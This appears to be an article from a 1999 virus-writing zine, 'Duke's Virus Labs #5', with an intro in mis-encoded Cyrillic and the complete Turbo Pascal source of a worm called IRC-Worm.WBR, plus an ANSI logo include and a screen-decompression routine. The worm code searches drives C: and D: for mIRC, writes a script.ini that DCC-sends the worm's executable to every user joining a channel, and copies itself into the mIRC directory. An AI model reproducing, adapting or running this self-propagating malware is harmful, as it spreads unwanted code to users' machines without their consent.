- [Duke's Virus Labs #5] - [Page 23] -

IRC-Worm.WBR
(c) by Duke/SMF

€¬п ўЁагб     : IRC-Worm.WBR
Ђўв®а         : Duke/SMF
џ§лЄ Їа®Ја.   : Turbo Pascal 7.0
„ в  б®§¤ ­Ёп : 28.02.99

   ЃҐ§ўаҐ¤­л© бҐвҐў®© :) ўЁагб. ‚лў®¤Ёв ­  нЄа ­ ANSI-аЁбг­®Є,   вҐ¬
ўаҐ¬Ґ­Ґ¬ ЁйҐв ­  ў иЁе ¤ЁбЄ е C Ё D гбв ­®ў«Ґ­­го Їа®Ја ¬¬г mIRC. …б«Ё
Їа®Ја ¬г«Ё­  ­ ©¤Ґ­ , в® ўЁагб®Є б®§¤ Ґв д ©« script.ini, Є®в®ал© Ё Ўг¤Ґв
®вўҐз вм §  ¤ «м­Ґ©иҐҐ а §¬­®¦Ґ­ЁҐ Ї® IRC. € ўбҐ - ’Ґ«Ґ¬ аЄҐв !  ;))

P.S. ‚ Їа®жҐббҐ б®§¤ ­Ёп ўЁагб  ЇаЁи«®бм ў®бЇ®«м§®ў вмбп Їа®Ја ¬¬®©
TheDraw Ё  ¬ҐаЁЄ ­бЄЁ¬ ®а«®¬. ‚бҐ¬ бЇ бЁЎ® ;))

===== begin irc-worm.pas =====
{$M 2000, 0, 1000}
program IRC_Worm__WBR;
uses dos;
{$I logo.inc}                   {ANSI-аЁбг­®Є}
{$I uncrunch.inc}               {Їа®жҐ¤га  ўлў®¤  аЁбг­Є }
{--------------------------------}
procedure MakeWorm(Dir:string); {б®§¤ ­ЁҐ д ©«  script.ini}
var f:text;
    ds:dirstr;
    ns:namestr;
    es:extstr;
begin
fsplit(paramstr(0),ds,ns,es);
assign(f,Dir+'script.ini');rewrite(f);
writeln(f,'[script]');
writeln(f,'n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick '+Dir+ns+es+' }');
writeln(f,'n1=// IRC-Worm.WBR (c) by Duke/SMF');
close(f);
exec(GetEnv('COMSPEC'),'/c copy '+paramstr(0)+' '+Dir+ns+es+' >nul');
end;
{--------------------------------}
procedure Search(Dir:string);   {бЄ ­Ёа®ў ­ЁҐ ¤ЁбЄ  Ё Ї®ЁбЄ MIRC}
var N,h:searchrec;
begin
if Dir[length(Dir)]<>'\'then Dir:=Dir+'\';
findfirst(Dir+'mirc*.*',$21,h);
if doserror=0 then MakeWorm(Dir);
{ЁбЄ вм ¤агЈЁҐ (ў«®¦Ґ­­лҐ) ¤ЁаҐЄв®аЁЁ:}
findfirst(Dir+'*.*',$3F,N);
while doserror=0 do
  begin
  with N do if (Attr and 16<>0) and (Name[1]<>'.') then Search(Dir+Name);
  findnext(N);
  end;
end;
{--------------------------------}
begin
UnCrunch(IMAGEDATA,ScreenAddr[(1*2)+(1*160)-162],IMAGEDATA_LENGTH);
Search('c:');
Search('d:');
end.
===== end   irc-worm.pas =====

===== begin logo.inc =====
{ TheDraw Pascal Crunched Screen Image.  Date: 02/23/99 }
const
  IMAGEDATA_WIDTH=80;
  IMAGEDATA_DEPTH=25;
  IMAGEDATA_LENGTH=1919;
  IMAGEDATA : array [1..1919] of Char = (
    #14,#16,#24,' ', #1,'°','±','І',#26, #9,'Ы','І','±','°',' ',#15,'H',
    'a','v','e',' ','a',' ','n','i','c','e',' ','I','R','C',' ','f','o',
    'r','e','v','e','r',' ','!','!','!',' ','W','i','t','h',' ','b','e',
    's','t',' ','r','e','g','a','r','d','s',',',' ','D','u','k','e','/',
    'S','M','F',#24,' ', #1,'°','±','І','Ы',#15,#17,'*',' ',' ','*',' ',
    ' ','*',' ',' ','*', #1,#16,'±','°','°','±','І','Ы', #9,#17,'І',#25,
    #25,'І','І',#24,#16,' ', #1,'°','±','І','Ы','Ы',#15,#17,'*',' ',' ',
    '*',' ',' ','*',' ', #1,#16,'І','±','°', #9,#17,'І',#25, #5, #7,'Ь',
    #15,#23,#26, #6,'Ы',' ',' ','±','±',' ',' ','Ы','Ы','°',' ','І','Ы',
    'Ь', #7,#17,'Ь',#25, #4, #9,'І', #4,#16,'Ы','Ы','І','±','°',#24,' ',
     #1,'°','±','І','Ы',#15,#17,'*',' ',' ','*',' ',' ','*',' ',' ','*',
     #9,'І','І', #1,#16,'Ы','Ы','Ы',#17,' ', #7,'Ь',#15,#23,'Ы','Ы','І',
    ' ', #7,#17,'Ы',#15,#23,#26, #3,'Ы','І',' ', #7,#17,'Ы',#15,#23,'Ы',
    'Ы','°',#26, #3,'Ы', #7,#17,'Ы',#15,#23,'Ы','Ы','±',' ',' ',#17,'Ы',
    'Ь',#25, #3, #9,'І','І', #4,#16,'±','°','°','±','І',#26, #8,'Ы','І',
    '±','°',#24,' ', #1,'°','±','І','Ы','Ы',#15,#17,'*',' ',' ','*',' ',
    ' ','*', #9,'І',#25, #4,#23,' ',' ',#15,#17,'Ы','Ы',#23,'Ы','І', #7,
    #17,'Ы','Ы',#15,#23,#26, #4,'Ы','І','Ы','Ы','Ы','°',#26, #4,'Ы', #7,
    #17,#26, #3,'Ы',#23,' ',' ',#15,'Я',#17,'Ы','Ь',#25, #3, #9,'І', #4,
    #16,'°','±','І',#26, #9,'Ы','І','±','°',#24,' ', #1,'°','±','І','Ы',
    #15,#17,'*',' ',' ','*',' ',' ','*', #9,'І',#25, #4,#23,' ',' ',#15,
    #17,'І','Ы','Ы',#23,'Ы', #7,#17,'Ы',#15,#23,'І','І',#26, #9,'Ы','°',
    #26, #5,'Ы', #7,#17,'Ы','Ы',#15,#23,'Ы', #7,#17,'Ы',#23,' ',' ',#17,
    'Ы',#15,'Ы',#25, #4, #9,'І',#15,#16,'І',#26, #8,'Ы','І','±','°',#24,
    ' ', #1,'°','±','І','Ы','Ы',#15,#17,'*',' ',' ','*',' ', #9,'І',#25,
     #4,#23,#25, #2,#15,'±','Ы','Ы','Ы','±',#26, #8,'Ы','І','±','Ы','І',
    'Ы','Ы','Ы','І','Ы',#19,'І', #7,'І','І','Ы',#15,#23,'І','І',' ', #7,
    #17,'Ы','Ы',#15,'Ы',#25, #3, #9,'І',#15,#16,#26, #8,'Ы','І','±','°',
    #24,' ', #1,'°','±','І','Ы',#15,#17,'*',' ',' ','*',' ', #9,'І','І',
    #25, #3,#23,#25, #2,#15,'±','±','Ы','Ы','Ы',#19,'І','Ы',#23,#26,#15,
    'Ы',#19,'І',#23,'Ы',#19,'І',#23,'Ы','Ы',#19,'І',#23,'Ы', #8,'І',#15,
    #17,#26, #3,'Ы',#25, #2, #9,'І','І', #4,#16,#26, #8,'Ы','І','±','°',
    #24,' ', #1,'°','±','І','Ы','Ы',#15,#17,'*',' ',' ','*', #9,'І',#25,
     #3,#23,' ',' ',#15,'Ы',' ', #8,'Я','Ы','Ы','Ь',#15,'Ы','Ы',#19,'І',
    #23,#26,#14,'Ы',#19,'І',#23,#26, #4,'Ы', #8,'Ь','Ы','Ы','І', #7,#17,
    'Ы',#15,'Ы','Ы','Ы',#25, #2, #9,'І', #4,#16,#26, #8,'Ы','І','±','°',
    #24,' ', #1,'°','±','І','Ы',#15,#17,'*',' ',' ','*', #9,'І','І',#25,
     #2,#23,#25, #2,#15,'Ы','°', #8,'±','І','Ы',#14,'Ь', #8,'Ы','Ь','Ь',
    #15,#26,#16,'Ы', #8,'Ь','Ы','Ы','Ы',#14,'Ь', #8,'І','Ы',#15,'±','Ы',
     #7,#17,'Ы',#15,'Ы','Ы',#25, #3, #9,'І','І',#15,#16,#26, #6,'Ы','І',
    '±','°',#24,' ','°','±','І',#26, #3,'Ы', #9,#17,'І',#25, #3,#23,#25,
     #2,#15,#17,'Ы',#23,'Ы','Ь', #8,'±','±','Ы',#14,'Ы','Ы',#16,'Я',#23,
    'Ы', #8,'Ы','Ь',#15,'І','Ы','Ы','Ы','І',#14,#22,#26, #4,'Ь',#15,#23,
    'Ы','Ы','Ы','Я', #8,'Ы','Ы',#14,'Ы',#16,'Я',#23,'Ы','Ы', #8,'І','Ы',
    #15,'І','Ы','Ы', #7,#17,'Ы',#15,'Ы','Ы',#25, #3, #9,'І','Ы',#15,#16,
    #26, #5,'Ы','І','±','°',#24,' ','°','±','І','Ы','Ы','Ы', #9,#17,'І',
    'І',#25, #2, #7,'Ы',#15,#23,'°','Ы', #7,#17,'Ы','Ы',#15,#23,'°','Ы',
    '±', #8,'І','І','І',#14,'Я','Я','Я', #8,'Я','Ы',' ',#15,'Ы','Ы',#14,
    'Ь',#22,'°','±','±','І','І','±','°',#23,'Ь',#15,'°', #8,'Я','Я',' ',
    #15,'°',#14,'Я','Я', #8,'І','І',#15,'°','±','Ы','Ы', #7,#17,'Ы','Ы',
    #15,'Ы','Ы',#25, #3, #9,'І', #4,#16,#26, #6,'Ы','І','±','°',#24,' ',
    '°','±','І','Ы','Ы','Ы',#17,#25, #3, #7,'Ы','Ы','Ы',#15,#23,'Ы','Ы',
    '°','°','І','Ы',' ','°','°',#26, #4,'±','°','°',#14,#22,'°',#23,'Ы',
     #0,#22,'Ь','±','0','І',' ','0',' ',#14,#23,'Ы',#22,'°',#15,#23,'±',
    '°','±','±','±','°','°',#25, #3,'Ы','Ы', #7,#17,'Ы','Ы',#15,'Ы','Ы',
    'Ы',#25, #2, #9,'І', #4,#16,#26, #5,'Ы','І','±','°',#24,' ','°','±',
    'І','Ы','Ы', #1,'Ы',#17,#25, #2, #7,'Ы','Ы',#15,#23,#26, #4,'Ы','І',
     #7,#17,'Ы','Ы','Ы',#15,#23,'Ы','Ы','Ы',#25, #4, #0,#22,'Н','Н','Н',
    '\','±', #8,'І', #0,'І',' ','/','/','Н','Н','Н', #7,#17,'Ы','Ы',#15,
    #23,'°',#26, #4,'Ы',#25, #2,#17,'Ы',#23,'Ы',#17,'Ы', #7,'Ы',#15,'Ы',
    'Ы', #7,'Ы',#25, #2, #9,'І',#15,#16,#26, #3,'Ы','І','±','°',#24,' ',
    '°','±','І','Ы','Ы', #1,'Ы',#17,' ',' ', #7,'Ь',#15,#23,#26, #5,'Ы',
    'І','Ы', #7,#17,'Ы','Ы','Ы',#15,#23,#26, #5,'Ы',' ', #8,#16,'°','±',
    #22,'±','±','±','І', #0,'±','І',' ','/','/',' ', #7,'°', #8,#23,'±',
    #15,'І','І',#26, #6,'Ы','°', #7,#17,'Ы',#15,#23,'І','Ы','Ы', #7,#17,
    'Ы','Ы',#15,'Ы','Ы',#25, #2, #9,'І',#15,#16,'Ы','Ы','Ы','І','±','°',
    #24,' ','°','±','І','Ы', #1,'Ы','Ы', #7,#17,'Ь','Ы',#15,#23,'І',#26,
     #5,'Ы','І','Ы', #7,#17,'Ы','Ы',#15,#23,#26, #4,'Ы',' ','Ы', #7,#17,
    'Ы', #8,#16,'І','І','±',#22,'±','±', #0,'±','±','І',' ','/','/', #7,
    '°','±','Ы',#15,#23,'±','І',#26, #6,'Ы','°', #7,#17,'Ы',#15,#23,'І',
    'І','Ы','Ы','Ы', #7,#17,'Ы',#15,'Ы','Ы',#25, #2, #9,'І', #4,#16,'Ы',
    'Ы','Ы','І','±','°',#24,' ','°','±',#17,#25, #2, #7,'Ь',#15,#23,'І',
    #26, #5,'Ы', #7,#17,'Ы',#15,#23,'І','Ы','Ы', #7,#17,'Ы',#15,#23,#26,
     #3,'Ы', #7,#17,'Ы','Ы','Ы',#23,' ',#15,'Ы','Ы','Ы', #8,'І',#16,'І',
    '±', #0,#22,'±','±','І',' ','/','/', #7,'°','Ы', #8,#23,'±',#15,'±',
    'І','І','Ы','Ы', #7,#17,#26, #4,'Ы',#15,#23,'°','І',#26, #3,'Ы', #7,
    #17,'Ы','Ы',#15,'Ы', #7,'Ь',#25, #2, #9,'І', #4,#16,'Ы','Ы','Ы','І',
    '±','°',#24,' ','°',#17,#25, #2, #7,'Ы',#15,#23,'±',#26, #4,'Ы','Я',
     #0,#22,'І','І',#15,#23,'І', #4,#16,'°', #0,#22,'І',#15,#23,'Ы','Ы',
     #4,#16,'Ы','Ы', #0,#22,'І','І', #7,#17,'Ы','Ы',#15,#23,'І',' ','Ы',
    'Ы', #8,'І',#16,'±','±', #0,#22,'±','±','І',' ',' ', #7,'°','±','Ы',
    #15,#23,'°', #8,'±',#15,'±','І', #0,#22,'І',#15,#16,'Ы',#23,'±', #7,
    #17,'Ы','Ы', #0,#22,'І', #7,#17,'Ы',#15,#23,'°','І', #0,#22,'І','І',
    #15,#23,'Ы','Ы', #7,#17,'Ы', #0,#22,'І', #7,#17,'Ы',#15,'Ы', #7,'Ы',
    #25, #2, #9,'І',#15,#16,'Ы','І','±','°',#24,' ',#17,#25, #2, #7,'Ы',
    #15,#23,'±', #0,#22,'І',#15,#23,'Ы','І', #0,#22,'І',#15,#23,'Ы',#16,
    ' ', #0,#22,'І',#15,#23,'І', #6,#16,'±',' ',#15,#23,'Ы', #0,#22,'І',
     #4,#16,'±','І','Ы', #0,#22,'І', #7,#17,'Ы', #4,#16,'Ы',#15,#23,'І',
     #7,#17,'Ы','Ы','Ы',#15,#23,'°','°', #8,'І','І',#16,'±','±',#22,'±',
     #0,'І',' ','Ь', #7,'Ы', #8,#16,'±','І',#23,'±', #0,#22,'І', #4,#16,
    'Ы','Ы','Ы', #7,#17,'Ы', #0,#22,'І', #4,#16,'Ы', #7,#17,'Ы',#15,#23,
    '°','І', #4,#16,'Ы', #0,#22,'І',#15,#23,'Ы','Ы', #4,#16,'°',#15,'°',
    '±','І', #0,#22,'І',#15,#17,'Ы',#16,'Ы','Ы',#17,#25, #2,#16,'Ы','І',
    '±','°',#24,#17,#25, #2, #7,'Ы','Ы', #6,#16,'±', #0,#22,'І','І',#15,
    #23,'І', #0,#22,'І', #6,#16,'±',#15,#23,'Ы','Ы','°',#16,#25, #6, #0,
    #22,'І', #7,#17,'Ы',#16,' ', #0,#22,'І',#15,#23,'І',#16,' ',' ', #7,
    #17,'Ы','Ы',#15,#23,'°', #8,'І','І',#16,'І','І', #0,#22,'К','Ы','Ы',
    #16,' ',#22,'І', #8,#23,'Ы','±','±', #4,#16,#26, #5,'Ы', #0,#22,'І',
    'І',#15,#23,'°','І', #4,#16,'Ы','І', #0,#22,'І',#15,#23,'Ы', #0,#22,
    'І', #4,#16,'±','І','Ы', #0,#22,'І','І', #7,#17,'Ы',#25, #3, #4,#16,
    'Ы','І','±','°',#24,#17,' ',' ', #7,'Ы','Ы',#16,#25, #2, #0,#22,'І',
    'І','І',#16,' ',' ',#15,#23,'±',#16,#25, #5, #0,#22,'І','І', #7,#17,
    'Ы',#16,' ', #0,#22,'І',#15,#23,'±',#16,#25, #2, #0,#22,'І', #7,#17,
    'Ы','Ы',#16,' ', #0,#22,'І', #8,#23,'І','І',#16,#25,#14, #0,#22,'І',
    #15,#23,'°',#16,#25, #4, #4,'°','±','І','Ы','Ы','Ы', #0,#22,'І', #7,
    #17,'Ы',#25, #2, #4,#16,'І','±','°',#24,#17,' ', #7,'Ы','Ы', #0,#22,
    'І', #8,#16,'F','l','a','g',' ','b','y',' ','S','h','e','r','r','y',
    ' ','P','z',#25, #7, #0,#22,'І', #7,#17,'Ы',#16,#25,#11, #0,#22,'І',
    #16,#25, #8, #8,'S','p','i','r','i','t',' ','b','y',' ',' ', #0,#22,
    'І', #7,#17,'Ы',' ',' ',#24,'Ы','Ы', #0,#22,'±',#16,' ',' ',#22,'І',
     #8,#16,'S','c','r','e','e','n',' ','b','y',' ','M','o','s','e','s',
    #25,#21, #0,#22,'І',#23,' ',#16,#25, #7, #8,'a','l','l',' ','A','m',
    'e','r','i','c','a','n','s', #0,#22,'І', #7,#17,'Ы',#24,#24);

type ScreenType = array [0..3999] of Byte;
var ScreenAddr : ScreenType absolute $B800:$0000;
===== end   logo.inc =====

===== begin uncrunch.inc =====
procedure UNCRUNCH (var Addr1,Addr2; BlkLen:Integer);
begin
  inline (
    $1E/               {       PUSH    DS             ;Save data segment.}
    $C5/$B6/ADDR1/     {       LDS     SI,[BP+Addr1]  ;Source Address}
    $C4/$BE/ADDR2/     {       LES     DI,[BP+Addr2]  ;Destination Addr}
    $8B/$8E/BLKLEN/    {       MOV     CX,[BP+BlkLen] ;Length of block}
    $E3/$5B/           {       JCXZ    Done}
    $8B/$D7/           {       MOV     DX,DI          ;Save X coordinate for later.}
    $33/$C0/           {       XOR     AX,AX          ;Set Current attributes.}
    $FC/               {       CLD}
    $AC/               {LOOPA: LODSB                  ;Get next character.}
    $3C/$20/           {       CMP     AL,32          ;If a control character, jump.}
    $72/$05/           {       JC      ForeGround}
    $AB/               {       STOSW                  ;Save letter on screen.}
    $E2/$F8/           {Next:  LOOP    LOOPA}
    $EB/$4C/           {       JMP     Short Done}
                       {ForeGround:}
    $3C/$10/           {       CMP     AL,16          ;If less than 16, then change the}
    $73/$07/           {       JNC     BackGround     ;foreground color.  Otherwise jump.}
    $80/$E4/$F0/       {       AND     AH,0F0H        ;Strip off old foreground.}
    $0A/$E0/           {       OR      AH,AL}
    $EB/$F1/           {       JMP     Next}
                       {BackGround:}
    $3C/$18/           {       CMP     AL,24          ;If less than 24, then change the}
    $74/$13/           {       JZ      NextLine       ;background color.  If exactly 24,}
    $73/$19/           {       JNC     FlashBitToggle ;then jump down to next line.}
    $2C/$10/           {       SUB     AL,16          ;Otherwise jump to multiple output}
    $02/$C0/           {       ADD     AL,AL          ;routines.}
    $02/$C0/           {       ADD     AL,AL}
    $02/$C0/           {       ADD     AL,AL}
    $02/$C0/           {       ADD     AL,AL}
    $80/$E4/$8F/       {       AND     AH,8FH         ;Strip off old background.}
    $0A/$E0/           {       OR      AH,AL}
    $EB/$DA/           {       JMP     Next}
                       {NextLine:}
    $81/$C2/$A0/$00/   {       ADD     DX,160         ;If equal to 24,}
    $8B/$FA/           {       MOV     DI,DX          ;then jump down to}
    $EB/$D2/           {       JMP     Next           ;the next line.}
                       {FlashBitToggle:}
    $3C/$1B/           {       CMP     AL,27          ;Does user want to toggle the blink}
    $72/$07/           {       JC      MultiOutput    ;attribute?}
    $75/$CC/           {       JNZ     Next}
    $80/$F4/$80/       {       XOR     AH,128         ;Done.}
    $EB/$C7/           {       JMP     Next}
                       {MultiOutput:}
    $3C/$19/           {       CMP     AL,25          ;Set Z flag if multi-space output.}
    $8B/$D9/           {       MOV     BX,CX          ;Save main counter.}
    $AC/               {       LODSB                  ;Get count of number of times}
    $8A/$C8/           {       MOV     CL,AL          ;to display character.}
    $B0/$20/           {       MOV     AL,32}
    $74/$02/           {       JZ      StartOutput    ;Jump here if displaying spaces.}
    $AC/               {       LODSB                  ;Otherwise get character to use.}
    $4B/               {       DEC     BX             ;Adjust main counter.}
                       {StartOutput:}
    $32/$ED/           {       XOR     CH,CH}
    $41/               {       INC     CX}
    $F3/$AB/           {       REP STOSW}
    $8B/$CB/           {       MOV     CX,BX}
    $49/               {       DEC     CX             ;Adjust main counter.}
    $E0/$AA/           {       LOOPNZ  LOOPA          ;Loop if anything else to do...}
    $1F);              {Done:  POP     DS             ;Restore data segment.}
end; {UNCRUNCH}
===== end   uncrunch.inc =====
